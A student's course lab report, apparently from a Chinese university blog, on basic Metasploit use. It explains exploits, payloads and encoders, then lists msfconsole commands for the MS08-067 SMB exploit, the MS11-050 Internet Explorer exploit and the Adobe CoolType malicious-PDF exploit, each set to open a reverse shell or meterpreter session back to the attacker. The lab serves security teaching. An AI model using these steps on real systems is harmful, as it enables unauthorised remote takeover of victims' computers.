20145225唐振遠《网络对抗》Exp5 MSF基础应用
基础问题回答
- 用自己的话解释什么是
exploit,payload,encode?exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。
实践过程记录
MS08_067漏洞渗透攻击(主动攻击)
- 使用
winXPenSP3为靶机; - 首先得确保两台机子在同一网段内
- 终端中打开
msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块; - 使用命令
set payload generic/shell_reverse_tcp指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP和set RHOST Windows的IP; show options查看所有参数是否设置正确,最后下令发起攻击exploit:
![]()
MS11050安全漏洞(IE浏览器渗透攻击)
- 终端中打开
msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP、set LPORT 自定义端口号和set URIPATH 自定义域名; show options查看所有参数是否设置正确,最后下令发起攻击exploit:
![]()
-
Adobe阅读器渗透攻击(针对客户端)
- 终端中打开
msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp指定攻击有效载荷; - 设置具体参数:
set FILENAME 自定义文件名.pdf、set LHOST Kali的IP和set LPORT 自定义端口号; show options查看所有参数是否设置正确,最后输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;



辅助模块的应用:scanner/http/dir_listing
通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击;
posted on 2017-04-16 23:06 20145225唐振远 阅读(186) 评论(0) 收藏 举报


浙公网安备 33010602011771号